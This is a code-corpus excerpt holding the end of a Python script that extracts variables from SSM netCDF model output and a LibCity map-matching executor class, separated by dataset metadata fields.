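# ("DOXG", InputAttr.BOTTOM) and colon_meta("DOXG:all") returns
# ("DOXG", InputAttr.ALL); an unknown attribute raises a KeyError.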
def main():
script_home = os.path.dirname(os.path.realpath(__file__))
parser = ArgumentParser(description="Extract data from SSM netcdf output files")
parser.add_argument("incdf", nargs="+", help="each input CDF file")
parser.add_argument("outcdf",
help="the output CDF file (created if it doesn't exist)")
parser.add_argument("outprefix",
help="a prefix for the extracted variables in the output CDF")
parser.add_argument("-d", dest="domain_node_shapefiles", action="append",
help="Specify a domain node shapefile")
parser.add_argument("-m", dest="masked_nodes_file", type=FileType('r'),
help="Specify a different masked nodes text file")
parser.add_argument("--invar", dest="input_vars", type=colon_meta,
action="append",
help="Extract the values of a different output variable")
parser.add_argument("-v", "--verbose", action="store_true", dest="verbose",
help="Print progress messages during the extraction")
parser.add_argument("-c", "--chunk-size", type=int, dest="chunk_size",
help="Process this many CDF files at once")
parser.add_argument("--cache", dest="cache", action="store_true",
help="Use a read/write cache in a temporary directory")
# Cannot include default values of lists here, see
# https://bugs.python.org/issue16399
parser.set_defaults(chunk_size=4, verbose=False,
masked_nodes_file=os.path.join(script_home, masked_nodes_txt))
args = parser.parse_args()
# This is the workaround
if not args.input_vars:
args.input_vars = [("DOXG",InputAttr.BOTTOM)]
if not args.domain_node_shapefiles:
args.domain_node_shapefiles = [os.path.join(script_home, domain_nodes_shp)]
logging.basicConfig(level=logging.INFO if args.verbose else logging.WARNING)
#logger.setLevel(logging.DEBUG)
if args.cache:
with tempfile.TemporaryDirectory() as tmpdir:
exist_cdfs = []
logger.info("Caching input files...")
for infile in args.incdf:
newpath = os.path.join(tmpdir, os.path.basename(infile))
shutil.copy(infile, newpath)
exist_cdfs.append(newpath)
output_cdf = os.path.join(tmpdir, os.path.basename(args.outcdf))
if os.path.exists(args.outcdf):
logger.info("Caching output file...")
shutil.copy(args.outcdf, output_cdf)
do_extract(exist_cdfs, output_cdf, **vars(args))
# Copy the resulting output CDF back
logger.info("Saving output file...")
shutil.copy(output_cdf, args.outcdf)
logger.info("Finished.")
else:
do_extract(args.incdf, args.outcdf, **vars(args))
def do_extract(exist_cdfs, output_cdf, **kwargs):
args = Namespace(**kwargs)
logger.info("Determining scope of work...")
indata = MFDataset(exist_cdfs) if len(exist_cdfs) > 1 else Dataset(exist_cdfs[0])
node_ids = get_node_ids(args.domain_node_shapefiles, args.masked_nodes_file)
logger.info("Initializing output file...")
if not os.path.exists(output_cdf):
outdata = init_output(output_cdf, indata, node_ids, **vars(args))
outdata['time'][:] = indata['time'][:] / 3600 / 24
else:
outdata = append_output(output_cdf)
init_output_vars(outdata, **vars(args))
# Attempts to use the entire MFDataset don't seem to scale well.
# Instead, I'm resorting to a blocking approach where MFDatasets are
# created for only a few netCDF files at a time
indata.close()
i = 0
total = 0
logger.info("Beginning extraction...")
start_time = time.perf_counter()
times_ct = outdata.dimensions['time'].size
for cdfchunk in chunks(exist_cdfs, args.chunk_size):
c = MFDataset(cdfchunk) if len(cdfchunk) > 1 else Dataset(cdfchunk[0])
chunk_times = len(c.dimensions['time'])
data = copy_data(c, outdata, i, node_ids, **vars(args))
i += chunk_times
c.close()
elapsed = (time.perf_counter() - start_time)
to_go = elapsed * (times_ct / i - 1)
total += np.sum([d.size * d.itemsize for k,d in data.items()])
logger.info("{0}/{1} ({2}s elapsed, {3}s to go, {4}KBps)".format(i,
times_ct, int(elapsed), int(to_go), int(total/elapsed/1000)))
logger.info("Extraction finished.")
outdata.close()
def copy_data(cdfin, cdfout, timeidx, node_ids, **kwargs):
args = Namespace(**kwargs)
times_ct = len(cdfin.dimensions['time'])
alldata = {}
# Copy zeta if it's needed
if 'zeta' in cdfout.variables:
alldata['zeta'] = cdfin['zeta'][:, node_ids - 1]
cdfout['zeta'][timeidx:timeidx + times_ct, :] = alldata['zeta']
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.ALL:
slc = slice(None)
elif attr == InputAttr.BOTTOM:
slc = -1
out_name += "_bottom"
# TODO add "photic" case which will look rather different
data = cdfin[var][:, slc, node_ids - 1]
logger.debug("data is shape " + str(data.shape))
if attr == InputAttr.ALL:
cdfout[out_name][timeidx:timeidx+times_ct,:,:] = data
else:
cdfout[out_name][timeidx:timeidx+times_ct,:] = data
alldata[out_name] = data
return alldata
if __name__ == "__main__": main()
| 2.140625 | 2 |
libcity/executor/map_matching_executor.py | nadiaaaaachen/Bigscity-LibCity | 1 | 4999 | <filename>libcity/executor/map_matching_executor.py
from logging import getLogger
from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor
from libcity.utils import get_evaluator
class MapMatchingExecutor(AbstractTraditionExecutor):
def __init__(self, config, model):
self.model = model
self.config = config
self.evaluator = get_evaluator(config)
self.evaluate_res_dir = './libcity/cache/evaluate_cache'
self._logger = getLogger()
def evaluate(self, test_data):
"""
        Run the map matching model on the test data and collect the results
        for evaluation.
        Args:
            test_data: dict of inputs for the model; must contain 'route' and
                'rd_nwk', which are passed to the evaluator with the result
"""
result = self.model.run(test_data)
batch = {'route': test_data['route'], 'result': result, 'rd_nwk': test_data['rd_nwk']}
self.evaluator.collect(batch)
self.evaluator.save_result(self.evaluate_res_dir)
def train(self, train_dataloader, eval_dataloader):
"""
        Traditional (non-learning) models require no training, so this is a no-op.
Args:
train_dataloader(torch.Dataloader): Dataloader
eval_dataloader(torch.Dataloader): Dataloader
"""
pass # do nothing
| 2.515625 | 3 |